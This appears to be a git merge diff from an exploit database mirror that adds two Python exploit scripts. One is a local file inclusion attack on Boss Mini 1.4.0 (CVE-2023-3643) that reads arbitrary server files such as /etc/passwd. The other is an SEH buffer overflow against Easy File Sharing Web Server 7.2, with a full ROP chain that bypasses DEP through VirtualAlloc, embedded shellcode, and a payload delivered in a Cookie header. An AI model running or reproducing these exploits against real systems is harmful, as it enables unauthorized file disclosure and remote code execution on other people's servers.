Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/webapps/52482.py

@@ -0,0 +1,61 @@
+# Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI)
+# Date: 07/12/2023
+# Exploit Author: nltt0
+# Version: 1.4.0 (Build 6221)
+# CVE: CVE-2023-3643
+
+from requests import post
+from urllib.parse import quote
+from argparse import ArgumentParser
+
+banner = r"""
+_____       _                              _____
+/  __ \     | |                            /  ___|
+| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--.
+| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
+| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
+\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
+                            __/ |
+                          |___/
+
+        by nltt0 [https://github.com/nltt-br]
+
+"""
+
+print(banner)
+
+try:
+    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
+    parser.add_argument('--domain', required=True, help='Application domain')
+    parser.add_argument('--file', required=True, help='Local file')
+
+    args = parser.parse_args()
+    host = args.domain
+    file = args.file
+    url = '{}/boss/servlet/document'.format(host)
+    file2 = quote(file, safe='')
+
+    headers = {
+        'Host': host,
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
+        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
+    }
+
+
+    data = {
+        'path': file2
+    }
+
+    try:
+        req = post(url, headers=headers, data=data, verify=False)
+        if req.status_code == 200:
+            print(req.text)
+
+    except Exception as e:
+        print('Error in {}'.format(e))
+
+
+except Exception as e:
+    print('Error in {}'.format(e))

exploits/multiple/webapps/52484.py

@@ -0,0 +1,263 @@
+# Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow
+# Date: 16/10/2025
+# Exploit Author: Donwor
+# X: @real_Donwor
+# Discord: Donwor
+# Website: https://github.com/D0nw0r
+# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
+# Version: Easy File Sharing Web Server v7.2
+# Tested on: Windows 10,11
+#
+# Notes:
+# - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others.
+# - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI
+# - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/)
+# - bad chars: '\x00' and '\x3b'
+
+
+
+import struct, sys, socket
+
+
+host = sys.argv[1]
+port = 80
+size = 5000
+
+
+rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<I", 0x41414141) # junk for pop edi
+rop += struct.pack("<I", 0x41414141) # junk for pop edi
+rop += struct.pack("<I", 0x41414141) # junk for ebp
+rop += struct.pack("<I", 0x1001db66) # :  # POP ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks
+rop += struct.pack("<I", 0x10022f45) #  # SUB EAX,ESI # POP EDI # POP ESI # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<I", 0x41414141) #  # SUB EAX,ESI # POP EDI # POP ESI # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<I", 0x41414141) #  # SUB EAX,ESI # POP EDI # POP ESI # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN    )
+rop += struct.pack("<L", 0x1001d626) # :  # XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+## Save ESP on ESI and EDI
+
+rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
+rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT
+rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc :  # MOV EAX,DWORD PTR [EAX] # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x41414141) # junk pop esi
+rop += struct.pack("<L", 0x41414141) # junk pop ebx
+rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+# Virtual Alloc on stack
+# Esi now has "SRP" we need to fill it
+# EDI still points to orignal one (Virtual alloc)
+
+
+rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x41414141) # junk pop esi
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
+rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed)
+rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x41414141) # junk pop esi
+
+# Virtual alloc | SRP | Shellcode Addr
+# edi -> virtualalloc
+
+rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) #
+rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
+rop += struct.pack("<L", 0xffffffff) # -1
+rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}) #
+rop += struct.pack("<L", 0x1001a8e3) # patch arg  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x41414141) # junk pop esi
+rop += struct.pack("<L", 0x41414141) # junk pop ebx
+
+#VirtualAlloc | SRP | ShellcodeAddr | dwSize
+# edi -> virtualalloc
+
+
+rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
+rop += struct.pack("<I", 0xffffefff) #  value to pop eax now
+rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002  NEG EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}) #
+rop += struct.pack("<I", 0x1001b7ca)# eax now 1000  # DEC EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001a8e3) # patch arg  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x41414141) # junk pop esi
+rop += struct.pack("<L", 0x41414141) # junk pop ebx
+
+#VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType
+# edi -> virtualalloc
+
+rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x1001715d) #
+rop += struct.pack("<L", 0x10015442) # :  # POP EAX # RETN
+rop += struct.pack("<I", 0xffffffbf) # :  -41
+rop += struct.pack("<L", 0x100231d1) # will turn eax into 41  NEG EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}) #
+rop += struct.pack("<I", 0x1001b7ca)# eax now 40  # DEC EAX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x1001a8e3) # patch arg  # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN    ** [ImageLoad.dll] **   |   {PAGE_EXECUTE_READ}
+rop += struct.pack("<L", 0x41414141) # junk pop esi
+rop += struct.pack("<L", 0x41414141) # junk pop ebx
+
+#VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType | flProtect
+# edi -> virtualalloc
+
+
+rop += struct.pack("<L", 0x61c0a798) # # XCHG EAX,EDI # RETN
+rop += struct.pack("<L", 0x61c07ff8) # XCHG EAX,ESP # RETN
+
+# Just switch execution now, move the stack pointer to EDI (VirtualAlloc)
+
+
+sc =  b""
+sc += b"\x81\xc4\x24\xfa\xff\xff" # add esp , -1500
+sc += b"\xbd\x04\xae\x2a\x98\xdb\xce\xd9\x74\x24\xf4\x5b"
+sc += b"\x31\xc9\xb1\x5e\x83\xeb\xfc\x31\x6b\x11\x03\x6b"
+sc += b"\x11\xe2\xf1\x52\xc2\x17\xf9\xaa\x13\x48\xc8\x78"
+sc += b"\x9a\x6d\x4e\xf6\xcf\x5d\x05\x5a\xfc\x16\x4b\x4f"
+sc += b"\x77\x5a\x43\x60\x30\xd1\xb5\x4f\xc1\xd7\x79\x03"
+sc += b"\x01\x79\x05\x5e\x56\x59\x34\x91\xab\x98\x71\x67"
+sc += b"\xc1\x75\x2f\xf3\x7b\x9a\x44\x41\x40\xcd\x5b\x96"
+sc += b"\x33\xb1\x23\x93\x84\x46\x9f\x9a\xd4\xf7\x94\xc5"
+sc += b"\xf4\x7c\xe2\xed\xf5\x51\x77\xc4\x82\x69\x3e\xe6"
+sc += b"\x95\x19\xf4\x83\x6b\xc8\xc5\x53\xc7\x35\xea\x59"
+sc += b"\x19\x71\xcc\x81\x6c\x89\x2f\x3f\x77\x4a\x52\x9b"
+sc += b"\xf2\x4d\xf4\x68\xa4\xa9\x05\xbc\x33\x39\x09\x09"
+sc += b"\x37\x65\x0d\x8c\x94\x1d\x29\x05\x1b\xf2\xb8\x5d"
+sc += b"\x38\xd6\xe1\x06\x21\x4f\x4f\xe8\x5e\x8f\x37\x55"
+sc += b"\xfb\xdb\xd5\x80\x7b\x24\x26\xad\x21\xb3\xeb\x60"
+sc += b"\xda\x43\x63\xf2\xa9\x71\x2c\xa8\x25\x3a\xa5\x76"
+sc += b"\xb1\x4b\xa1\x88\x6d\xf3\xa1\x76\x8e\x04\xe8\xbc"
+sc += b"\xda\x54\x82\x15\x63\x3f\x52\x99\xb6\xaa\x58\x0d"
+sc += b"\xf9\x83\x64\xc7\x91\xd1\x94\xd6\xda\x5f\x72\x88"
+sc += b"\x4c\x30\x2a\x69\x3d\xf0\x9a\x01\x57\xff\xc5\x32"
+sc += b"\x58\xd5\x6e\xd8\xb7\x80\xc7\x75\x21\x89\x93\xe4"
+sc += b"\xae\x07\xde\x27\x24\xa2\x1f\xe9\xcd\xc7\x33\x1e"
+sc += b"\xaa\x27\xcb\xdf\x5f\x28\xa1\xdb\xc9\x7f\x5d\xe6"
+sc += b"\x2c\xb7\xc2\x19\x1b\xcb\x04\xe5\xda\xfa\x7f\xd0"
+sc += b"\x48\x43\x17\x1d\x9d\x43\xe7\x4b\xf7\x43\x8f\x2b"
+sc += b"\xa3\x17\xaa\x33\x7e\x04\x67\xa6\x81\x7d\xd4\x61"
+sc += b"\xea\x83\x03\x45\xb5\x7c\x66\xd5\xb2\x83\xf5\xf2"
+sc += b"\x1a\xec\x05\x43\x9b\xec\x6f\x43\xcb\x84\x64\x6c"
+sc += b"\xe4\x64\x85\xa7\xad\xec\x0c\x26\x1f\x8c\x11\x63"
+sc += b"\xc1\x10\x12\x80\xda\xa3\x69\xe9\xdd\x43\x8e\xe3"
+sc += b"\xb9\x43\x8f\x0b\xbc\x78\x46\x32\xca\xbf\x5b\x01"
+sc += b"\xd5\x5d\x71\x7c\x7e\xf8\x10\x3d\xe3\xfb\xcf\x02"
+sc += b"\x1a\x78\xe5\xfa\xd9\x60\x8c\xff\xa6\x26\x7d\x72"
+sc += b"\xb6\xc2\x81\x21\xb7\xc6"
+
+
+padding = b"\x45" * 4 # 4 bytes of padding because of the alignment, the add eax,20 instructions will make it so stack points 4 bytes after
+rop += padding
+rop += sc
+rop += b"\x42" * (1244 - len(rop))
+
+
+nseh = struct.pack("<I", 0x43434343)
+seh = struct.pack("<I", 0x10022877) # add esp, 1004; ret
+eax_offset = 4183
+
+buf = b"A" * 2811 # rop chain start after add esp 1004
+buf += rop
+buf += b"A" * (4059 - len(buf))  #nseh
+buf += nseh + seh
+buf += b"A" * (eax_offset - len(buf))
+buf += struct.pack("<I", 0xffffffff) #" #make sure eax always trigger exception
+buf += b"A" * (size - len(buf))
+
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host ,port))
+
+httpreq = (
+b"GET /changeuser.ghp HTTP/1.1\r\n"
+b"User-Agent: Mozilla/4.0\r\n"
+b"Host:" + host.encode() + b":" + str(port).encode() + b"\r\n"
+b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+b"Accept-Language: en-us\r\n"
+b"Accept-Encoding: gzip, deflate\r\n"
+b"Referer: http://" + host.encode() + b"/\r\n"
+b"Cookie: SESSIONID=6771; UserID=" + buf + b"; PassWD=;\r\n"
+b"Conection: Keep-Alive\r\n\r\n"
+)
+
+# Send payload to the server
+try:
+    if len(sys.argv) < 2:
+        print("[!] Usage: python3 exploit.py <IP of Server>")
+        sys.exit(1)
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.send(httpreq)
+    s.close()
+    print("[+] Packet sent!")
+except:
+    print("[!] Could not connect to server / Exploit failed")
+    sys.exit(1)
+
+sys.exit(0)